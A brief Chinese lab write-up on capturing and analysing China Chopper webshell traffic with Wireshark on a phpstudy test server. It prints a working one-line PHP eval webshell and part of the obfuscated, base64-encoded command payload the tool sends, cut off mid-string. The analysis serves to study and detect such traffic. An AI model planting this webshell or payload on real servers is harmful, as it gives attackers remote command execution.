环境
win10虚拟机
phpstudy搭建的服务器
菜刀
wireshark
准备
向服务端上传一句话木马caidao.php
<?php
@eval($_POST['cmd']);
?>
配置好菜刀:
服务器中打开wireshark进行监听
抓包分析
菜刀中打开虚拟终端并输入dir系统命令显示当前目录文件。
查看wireshark抓取的数据包信息
抓取传输的数据:
array_map("ass"."ert",array("ev"."Al(\"\\\$xx=\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21h